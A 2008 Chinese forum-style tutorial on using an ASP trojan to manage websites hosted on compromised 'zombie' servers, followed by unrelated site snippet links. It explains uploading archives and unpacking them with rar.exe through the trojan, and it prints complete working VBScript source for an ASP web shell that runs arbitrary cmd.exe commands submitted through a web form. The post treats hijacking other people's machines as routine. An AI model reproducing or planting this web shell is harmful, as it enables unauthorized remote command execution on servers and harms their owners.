用ASP木马实现FTP和解压缩
发布时间:2008-02-13 08:47:00
我想大家都有一些开了80端口的肉 * ,如果是国内的出于安全就不要往下看了,如果不不妨往下看一下,小弟献丑了,以求抛砖引玉。
在肉鸡上放网站最麻烦的可能就是更新和上传大量的文件了,终端服务大白天容易被发现,自己开个ftp又不放心.自己在网上转了一圈发现通过结合无组件上传和ASP木马可以轻松实现。
asp木马大家都很熟悉,无非就是一个cmd,有什么作用啊,你别急,听我慢慢说嘛.整体思路就是先通过ftp,139,或者winshell上传一个无组件asp程序。我选择了化境的Webedit(其实这个已经不是一个单纯的无组件上传的工具了,通过它还可以修改,删除文件/目录,可以用来更新页面喔,作起来广告了,我跟他没亲戚啊,闪过一个flying bottle..继续)和一个asp木马(如果,实在懒得找。最后带着源码,粘贴另存为asp文件即可),记住可都要在肉鸡的web目录喔.其实大多的问题webedit都可以解决,不过如果有很多文件一个一个上传可就麻烦了,怎么办?
这下asp木马用上了。找一个rar.exe(所有装过了winrar的目录都有,说不定肉鸡上已经安好了,如果是别的命令行的解压缩工具也可以喔)把它拷到%SystemRoot%\system32\下。上传.zip或者.rar文件到该肉鸡的web目录。在浏览器地址栏里打开asp木马(暂时称之为trojan.asp),在text文本框里输入rar -x source.rar path解压缩成功,V,且慢如何得到web目录的绝对路径(path)呢?我用的是用土方法,修改trojan.asp加入一行转换虚拟目录成绝对路径并输出的语句<% =server.mappath(".") %>,"."可以随意改成任何的相对虚拟目录。
只是提供一个思路,如果哪个牛人可写一个asp的解压缩那更好喽,不过?谁会呢,我不会,你会吗?至于如何隐藏虚拟目录,支持简体中文显示等就不是该篇的讨论之列了,老话,安全第一,一般放个小的论坛或聊天室就可以了,如果真放个个人主页,还把自己的联系地址,电话号码也留给人家就不太好了.ps.junesun建议直接作成自解压,不知会不会弹出对话框。
<%@ Language=VBScript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
<
' -- create the COM objects that we will be using -- '
Set oScript = Server.createObject("WSCRIPT.SHELL")
Set oScriptNet = Server.createObject("WSCRIPT.netWORK")
Set oFileSys = Server.createObject("Scripting.FileSystemObject") <
' -- check for a command that we have posted -- '
szCMD = Request.form(".CMD")
If (szCMD <> "") Then <
' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) <
End If <
%>
<HTML>
<BODY>
<form action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</form>
<PRE> <
<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.deleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
0
投稿猜你喜欢
- 经常看到说正则的文章,但说的只是方法,却很少有说以下几个基本概念: 1.贪婪:+,*,?,{m,n}等默认是贪婪匹配,即尽可能多匹配,也叫最
- 下表列出 SQL Server 查询分析器提供的所有键盘快捷方式。活动 快捷方式 书签:清除所有书签。 CTRL-SHIFT-F2
- <script type="text/javascript">/*<
QQ登录Banner增加了剧情的概念之后,已经推出了春节和情人节两期。这之后设想能围绕Banner做的更加丰富,对传统文化的体现也能更为深入- 1.1.1 摘要 Join是关系型数据库系统的重要操作之一,SQL Server中包含的常用Join:内联接、外联接和交叉联接等。如果我们想
- 本文介绍了一种将英文字符首个字母串转换为大写的asp代码,当然这个功能可能英文网站比较有用。转换大写功能英文介绍:Code Title: P
- CREATE TABLE `category` ( `Id` binary(1
- 有没有办法更快一点? 有没有办法一次性收缩所有数据库? 代码如下:alter database 数据库名 set recovery simp
- 希腊Web 设计师Christos Chiotis 发表在 CssGlobe 的一篇文章,讲述了黄金分割率在 CSS 中的应用。黄金分割率是
- 简单方法实现网页自动适应任何分辨率任何窗口大小(只适用于IE)<!DOCTYPE html PUBLIC "-//W3C//
- <% dim result,result1 str="ad_asp之家_nzlkjlkfjoj
- 本文介绍使用aspjpeg组件实现图片的半透明描边的效果,描边效果演示:参数说明'big 原图路径(相对)'small 生成
- 阅读上一篇教程:WEB2.0网页制作标准教程(9)第一个CSS布局实例如果我们想在3列布局的最后加一行页脚,放版权之类的信息。就遇到必须对齐
